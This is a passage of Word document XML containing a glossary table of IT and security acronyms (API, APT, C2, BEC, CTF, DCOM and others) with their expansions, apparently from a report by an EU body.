            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C74CDA9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1802953A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="704130EB" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EF778CE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46E23CBE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Advanced Persistent Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4E90DEA7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0FFE96CB" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ARP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="34EBA11E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Address Resolution Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="153D586C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26BA95F2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ASCII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5F172041" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>American Standard Code for Information Interchange</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6377CA28" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D75F5E8" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6167BAD8" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Amazon Web Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4A1646BD" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05934AA2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7EA2E41E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Business Email Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="2C544D6F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53A4939B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BBF7E11" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Basic Input/Output System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1ABB5C01" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="392B6D85" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BITS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52156B1F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Windows Background Intelligent Transfer Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="286F9C6F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="20C560BE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>C&amp;C or C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F1D0C59" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="780E5A0E" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EA201B1" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0827C071" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Commission Enterprise Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="00071933" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59A1D554" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3081D64D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Continuous Integration and Continuous Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0BE36AFC" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B5E691C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5FF317C3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command Line Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="56FD08B3" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2E8C028A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>COM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C4A3C6D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Component Object Model </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="72A118AD" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44439278" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CTF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F56DE75" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Capture The Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1FA4BB49" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="293C8D86" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="130E1E15" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Database Activity Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="48BF14C9" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0DB1A714" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="73636FA5" w14:textId="190D92F8" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="001257D9" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="545AC3E5" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="658D48FF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="783640A4" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="12539D6A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="391A0CD2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DCOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="376AABF5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Distributed Component Object Model </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="76E358EF" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2CCAA2F5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74DA545D" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Directorate General</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="06B5C200" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0AD7D16C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
